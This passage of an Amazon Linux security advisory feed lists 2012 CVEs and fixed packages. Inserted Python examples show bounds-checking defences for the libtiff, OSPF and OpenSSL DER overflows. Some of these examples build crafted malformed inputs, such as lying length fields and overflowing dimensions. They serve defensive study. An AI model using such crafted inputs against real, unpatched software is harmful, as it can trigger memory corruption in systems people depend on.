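Added example, not from the advisory: the arithmetic behind this bug. The tile buffer size is width times height times samples times bytes per sample; computed in a 32-bit C integer, crafted dimensions make the product wrap to a small number, the allocation is small, and the decoder then writes the full tile into it. The code below emulates the wrapping multiply in Python, shows the pre-fix shape beside a checked multiply that refuses before anything is allocated, and a copy routine that reports whether a C memcpy would have run past the buffer. The dimensions used are constructed for illustration.

```python
LIMIT32 = 2**32 - 1   # largest value a 32-bit unsigned size can hold

def mul32(a, b):
    """Emulate an unsigned 32-bit C multiply: the product wraps modulo 2**32."""
    return (a * b) % 2**32

def tile_bytes_unchecked(width, height, samples, bits):
    """Shape of the pre-fix computation: width * height * samples * bytes per
    sample with no overflow test, so crafted dimensions wrap to a tiny size."""
    return mul32(mul32(mul32(width, height), samples), (bits + 7) // 8)

def checked_mul(a, b, limit=LIMIT32):
    """Multiply only if the product fits in `limit`; fail before allocating."""
    if a and b and b > limit // a:
        raise OverflowError("%d * %d does not fit in 32 bits" % (a, b))
    return a * b

def tile_bytes_checked(width, height, samples, bits):
    """Same formula, but every step is checked against the 32-bit limit."""
    size = checked_mul(width, height)
    size = checked_mul(size, samples)
    return checked_mul(size, (bits + 7) // 8)

def copy_tile(width, height, samples, bits, sizer):
    """Allocate whatever `sizer` says, then 'decode' the tile into it.
    Returns True when the tile fits, False when a C memcpy would have written
    past the end of the heap buffer (the CVE-2012-1173 condition)."""
    true_size = width * height * samples * ((bits + 7) // 8)   # exact, Python ints
    buf = bytearray(sizer(width, height, samples, bits))
    if true_size > len(buf):
        return False
    buf[:true_size] = bytes(true_size)    # stand-in for the decoded pixel data
    return True

def checked_sizer_rejects(width, height, samples, bits):
    """True when the checked path refuses the dimensions instead of allocating."""
    try:
        tile_bytes_checked(width, height, samples, bits)
        return False
    except OverflowError:
        return True
```

A 65537 by 65536 one-sample, 8-bit tile needs just over 4 GiB; the wrapped product is 65536, so the vulnerable path hands the decoder a 64 KiB buffer. The same pre-allocation check applies to any size derived from file-controlled fields, which is also the shape of the libpng and OpenSSL integer errors elsewhere on this page.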
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1173" title="" id="CVE-2012-1173" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0468.html" title="" id="RHSA-2012:0468" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtiff-debuginfo" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="5.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-5.8.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-5.8.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-5.8.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-5.8.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="5.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-5.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-66</id><title>Amazon Linux - ALAS-2012-66: important priority package update for freetype</title><issued date="2012-04-30 14:46:00" /><updated 
date="2014-09-14 15:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1134:
Multiple flaws were found in the way FreeType handled TrueType Font (TTF), Glyph Bitmap Distribution Format (BDF), Windows .fnt and .fon, and PostScript Type 1 fonts. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 and other products, allows remote attackers to cause a denial of service (invalid heap write operation and memory corruption) or possibly execute arbitrary code via crafted private-dictionary data in a Type 1 font.
800592:
CVE-2012-1134 freetype: limited heap buffer overflow in Type1 parser T1_Get_Private_Dict() (#35608)
CVE-2012-1126:
Multiple flaws were found in the way FreeType handled fonts in various formats. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash.
FreeType before 2.4.9, as used in Mozilla Firefox Mobile before 10.0.4 and other products, allows remote attackers to cause a denial of service (invalid heap read operation and memory corruption) or possibly execute arbitrary code via crafted property data in a BDF font.
800581:
CVE-2012-1126 freetype: heap buffer over-read in BDF parsing _bdf_is_atom() (#35597, #35598)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1126" title="" id="CVE-2012-1126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1134" title="" id="CVE-2012-1134" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0467.html" title="" id="RHSA-2012:0467" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freetype" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-6.12.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-6.12.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-6.12.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-6.12.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-6.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-67</id><title>Amazon Linux - ALAS-2012-67: medium priority package update for nvidia</title><issued date="2012-04-30 14:47:00" /><updated date="2014-09-14 16:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0946:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0946" title="" id="CVE-2012-0946" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nvidia" version="295.40.3.2.12" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/nvidia-295.40.3.2.12-1.1.amzn1.x86_64.rpm</filename></package><package name="nvidia-kmod" version="295.40.3.2.12" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/nvidia-kmod-295.40.3.2.12-1.1.amzn1.x86_64.rpm</filename></package><package name="nvidia-kmod-3.2.12-3.2.4.amzn1" version="295.40" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/nvidia-kmod-3.2.12-3.2.4.amzn1-295.40-1.1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-68</id><title>Amazon Linux - ALAS-2012-68: medium priority package update for libpng</title><issued date="2012-04-30 14:52:00" /><updated date="2014-09-14 15:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3048:
The png_set_text_2 function in pngset.c in libpng 1.0.x before 1.0.59, 1.2.x before 1.2.49, 1.4.x before 1.4.11, and 1.5.x before 1.5.10 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted text chunk in a PNG image file, which triggers a memory allocation failure that is not properly handled, leading to a heap-based buffer overflow.
A heap-based buffer overflow flaw was found in the way libpng processed tEXt chunks in PNG image files. An attacker could create a specially-crafted PNG image file that, when opened, could cause an application using libpng to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
808139:
CVE-2011-3048 libpng: memory corruption flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3048" title="" id="CVE-2011-3048" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0523.html" title="" id="RHSA-2012:0523" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libpng-devel" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.49" release="1.12.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.49-1.12.amzn1.i686.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.49-1.12.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.49-1.12.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.49-1.12.amzn1.x86_64.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="1.12.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.49-1.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-69</id><title>Amazon Linux - ALAS-2012-69: low priority package update for perl-YAML-LibYAML</title><issued date="2012-04-30 14:53:00" 
/><updated date="2014-09-14 15:59:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1152:
Multiple format string vulnerabilities in the error reporting functionality in the YAML::LibYAML (aka YAML-LibYAML and perl-YAML-LibYAML) module 0.38 for Perl allow remote attackers to cause a denial of service (process crash) via format string specifiers in a (1) YAML stream to the Load function, (2) YAML node to the load_node function, (3) YAML mapping to the load_mapping function, or (4) YAML sequence to the load_sequence function.
801738:
CVE-2012-1152 perl-YAML-LibYAML: Multiple format string flaws by reporting errors during YAML document load
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1152" title="" id="CVE-2012-1152" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-YAML-LibYAML-debuginfo" version="0.38" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.38-2.2.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.38" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-0.38-2.2.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML-debuginfo" version="0.38" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.38-2.2.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.38" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-0.38-2.2.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-70</id><title>Amazon Linux - ALAS-2012-70: medium priority package update for quagga</title><issued date="2012-04-30 14:55:00" /><updated date="2014-09-14 15:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0250:
Buffer overflow in the OSPFv2 implementation in ospfd in Quagga before 0.99.20.1 allows remote attackers to cause a denial of service (daemon crash) via a Link State Update (aka LS Update) packet containing a network-LSA link-state advertisement for which the data-structure length is smaller than the value in the Length header field.
A buffer overflow flaw was found in the way the ospfd daemon processed certain Link State Update packets. An OSPF router could use this flaw to crash ospfd on an adjacent router.
802829:
CVE-2012-0250 quagga (ospfd): Crash by processing LS-Update OSPF packet due to improper length check of the Network-LSA structures
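Added example, not from the advisory: a defensive parser for the structure at issue. An LS Update carries a count of LSAs, each with a 20-byte header whose Length field states how long the whole LSA is; a network-LSA body is a 4-byte network mask followed by 4-byte attached-router IDs. ospfd trusted the Length field, so a value larger than the bytes actually present made it read past the packet. The parser below checks Length against both the header size and the bytes remaining, rejects bodies that are not a whole number of router IDs, and is driven by constructed packets (a builder is included so the Length field can be made to lie).

```python
import struct

LSA_HDR = struct.Struct("!HBBIIIHH")  # age, options, type, LS id, adv router, seq, checksum, length
NETWORK_LSA = 2

def parse_ls_update_body(body):
    """Parse the LSA list of an OSPFv2 LS Update (the bytes after the 24-byte
    OSPF header): a 4-byte LSA count, then the LSAs back to back.
    Returns [(ls_type, ls_id, payload)] or raises ValueError."""
    if 4 > len(body):
        raise ValueError("no LSA count")
    (count,) = struct.unpack_from("!I", body, 0)
    off, lsas = 4, []
    for _ in range(count):
        if off + LSA_HDR.size > len(body):
            raise ValueError("LSA header runs past the end of the packet")
        _age, _opts, ls_type, ls_id, _adv, _seq, _cksum, length = LSA_HDR.unpack_from(body, off)
        # The check ospfd lacked: Length must cover at least the header and
        # must not claim more bytes than the packet still holds.
        if LSA_HDR.size > length:
            raise ValueError("LSA length %d is shorter than the header" % length)
        if off + length > len(body):
            raise ValueError("LSA length %d exceeds the %d bytes remaining" % (length, len(body) - off))
        lsas.append((ls_type, ls_id, body[off + LSA_HDR.size:off + length]))
        off += length
    return lsas

def parse_network_lsa(payload):
    """Network-LSA body: 4-byte network mask, then 4-byte attached-router IDs."""
    if 4 > len(payload) or len(payload) % 4:
        raise ValueError("malformed network-LSA body of %d bytes" % len(payload))
    mask = struct.unpack_from("!I", payload, 0)[0]
    routers = [struct.unpack_from("!I", payload, o)[0] for o in range(4, len(payload), 4)]
    return mask, routers

def dotted(addr):
    """Render a 32-bit router ID as dotted quad."""
    return ".".join(str((addr >> shift) % 256) for shift in (24, 16, 8, 0))

def attached_routers(ls_update_body):
    """All router IDs advertised in network-LSAs of one LS Update."""
    out = []
    for ls_type, _ls_id, payload in parse_ls_update_body(ls_update_body):
        if ls_type == NETWORK_LSA:
            _mask, routers = parse_network_lsa(payload)
            out.extend(dotted(r) for r in routers)
    return out

def rejects(ls_update_body):
    """True when the parser refuses the packet (for exercising crafted input)."""
    try:
        attached_routers(ls_update_body)
        return False
    except ValueError:
        return True

# Builders for constructed test packets (not captured traffic).
def build_network_lsa(ls_id, adv_router, routers, claimed_length=None):
    """`claimed_length` lets the Length field disagree with the real size."""
    body = struct.pack("!I", 0xFFFFFF00) + b"".join(struct.pack("!I", r) for r in routers)
    length = LSA_HDR.size + len(body) if claimed_length is None else claimed_length
    return LSA_HDR.pack(1, 0x22, NETWORK_LSA, ls_id, adv_router, 0x80000001, 0, length) + body

def build_ls_update_body(lsas):
    return struct.pack("!I", len(lsas)) + b"".join(lsas)
```

Note that the check is against the bytes remaining in the packet, not the IP length or the socket read size; a Length that is internally consistent but leaves a partial LSA at the end of the packet is rejected by the header-size test on the next iteration.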
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0250" title="" id="CVE-2012-0250" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="quagga-contrib" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga-devel" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.20.1-1.4.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.20.1-1.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-71</id><title>Amazon Linux - ALAS-2012-71: medium priority package update for wireshark</title><issued date="2012-04-30 16:16:00" /><updated date="2014-09-14 15:50:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1590:
The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before 1.4.5 does not properly initialize certain global variables, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file.
Several flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
697741:
CVE-2011-1590 Wireshark: Use-after-free causes heap-based buffer overflow in X.509if dissector
CVE-2011-1143:
epan/dissectors/packet-ntlmssp.c in the NTLMSSP dissector in Wireshark before 1.4.4 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted .pcap file.
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
681760:
CVE-2011-1143 Wireshark: Null pointer dereference causing application crash when reading malformed pcap file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1143" title="" id="CVE-2011-1143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1590" title="" id="CVE-2011-1590" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0509.html" title="" id="RHSA-2012:0509" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="wireshark-devel" version="1.2.15" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.2.15-2.10.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.2.15" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.2.15-2.10.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.2.15" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.2.15-2.10.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.2.15" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.2.15-2.10.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.2.15" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.2.15-2.10.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.2.15" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.2.15-2.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-72</id><title>Amazon Linux - ALAS-2012-72: important priority package update for openssl</title><issued date="2012-05-02 12:28:00" /><updated date="2014-09-14 15:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2110:
The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
814185:
CVE-2012-2110 openssl: asn1_d2i_read_bio integer errors leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2110" title="" id="CVE-2012-2110" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0518.html" title="" id="RHSA-2012:0518" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-static" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0i-1.41.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0i" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0i" release="1.41.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/openssl-1.0.0i-1.41.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-73</id><title>Amazon Linux - ALAS-2012-73: important priority package update for openssl098e</title><issued date="2012-05-02 12:31:00" /><updated date="2014-09-14 15:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2110:
The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
814185:
CVE-2012-2110 openssl: asn1_d2i_read_bio integer errors leading to buffer overflow
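The flaw above is a length field that is trusted before it is checked against the data actually present. The following is an added example, not OpenSSL or Amazon Linux code: a minimal DER tag-length-value reader in Python that validates every length before using it, run over constructed inputs (a well-formed SEQUENCE, one claiming far more content than exists, and one truncated mid-element). The four-octet cap on length fields is a policy choice for this example, not a DER rule.

```python
# Added example, not OpenSSL code: a DER reader that bounds-checks every
# length field against the bytes present before using it. CVE-2012-2110 is a
# failure of this kind of check inside asn1_d2i_read_bio. The sample inputs
# are constructed for this example and are not exploit data.

class DerError(ValueError):
    """Malformed or truncated DER input."""

MAX_LENGTH_OCTETS = 4  # policy choice for this example: refuse absurd lengths


def read_length(buf, pos):
    """Decode the DER length at buf[pos]; return (length, position after it)."""
    if pos >= len(buf):
        raise DerError("truncated before length octet")
    first = buf[pos]
    pos += 1
    if first == 0x80:
        raise DerError("indefinite length is BER, not DER")
    if first > 0x7F:  # long form: low 7 bits give the number of length octets
        n_octets = first - 0x80
        if n_octets > MAX_LENGTH_OCTETS:
            raise DerError("length field of %d octets refused" % n_octets)
        if pos + n_octets > len(buf):
            raise DerError("truncated inside length field")
        if buf[pos] == 0:
            raise DerError("non-minimal length encoding")
        length = int.from_bytes(buf[pos:pos + n_octets], "big")
        if n_octets == 1 and not length > 0x7F:
            raise DerError("long form used for a short-form length")
        pos += n_octets
    else:
        length = first
    # The essential bounds check: the value must lie inside the buffer.
    if pos + length > len(buf):
        raise DerError("length %d exceeds %d available bytes"
                       % (length, len(buf) - pos))
    return length, pos


def read_tlv(buf, pos=0):
    """Return (tag, value_bytes, position after the element)."""
    if pos >= len(buf):
        raise DerError("truncated before tag")
    tag = buf[pos]
    if tag % 32 == 31:
        raise DerError("multi-octet tags not supported by this example")
    length, pos = read_length(buf, pos + 1)
    return tag, buf[pos:pos + length], pos + length


def parse_sequence(buf):
    """Parse a top-level SEQUENCE into a list of (tag, value) children."""
    tag, body, end = read_tlv(buf, 0)
    if tag != 0x30:
        raise DerError("expected SEQUENCE tag 0x30, got 0x%02x" % tag)
    if end != len(buf):
        raise DerError("%d trailing bytes after SEQUENCE" % (len(buf) - end))
    children = []
    pos = 0
    while pos != len(body):  # pos only grows and never passes len(body)
        child_tag, value, pos = read_tlv(body, pos)
        children.append((child_tag, value))
    return children


def is_well_formed(buf):
    """True when buf parses as a DER SEQUENCE with every length in bounds."""
    try:
        parse_sequence(buf)
    except DerError:
        return False
    return True


# Constructed inputs for this example.
GOOD = bytes.fromhex("3006020105020107")         # SEQUENCE { INTEGER 5, INTEGER 7 }
OVERSIZED = bytes.fromhex("3084ffffffff020105")  # claims 4 GiB of content
TRUNCATED = bytes.fromhex("3006020105")          # claims 6 bytes, carries 3

if __name__ == "__main__":
    print(parse_sequence(GOOD))
    for sample in (OVERSIZED, TRUNCATED):
        print(sample.hex(), "well-formed:", is_well_formed(sample))
```

The check that matters is the one after the length is decoded: the declared length is compared with what remains in the buffer before any slice or allocation happens, so an attacker-controlled length can at most produce a parse error.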
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2110" title="" id="CVE-2012-2110" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0518.html" title="" id="RHSA-2012:0518" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl098e" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-0.9.8e-17.8.amzn1.i686.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-debuginfo-0.9.8e-17.8.amzn1.i686.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-debuginfo-0.9.8e-17.8.amzn1.x86_64.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="17.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-0.9.8e-17.8.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-74</id><title>Amazon Linux - ALAS-2012-74: important priority package update for nginx</title><issued date="2012-05-08 23:12:00" /><updated date="2014-09-14 16:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2089:
Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
812093:
CVE-2012-2089 nginx: arbitrary code execution in mp4 pseudo-streaming module
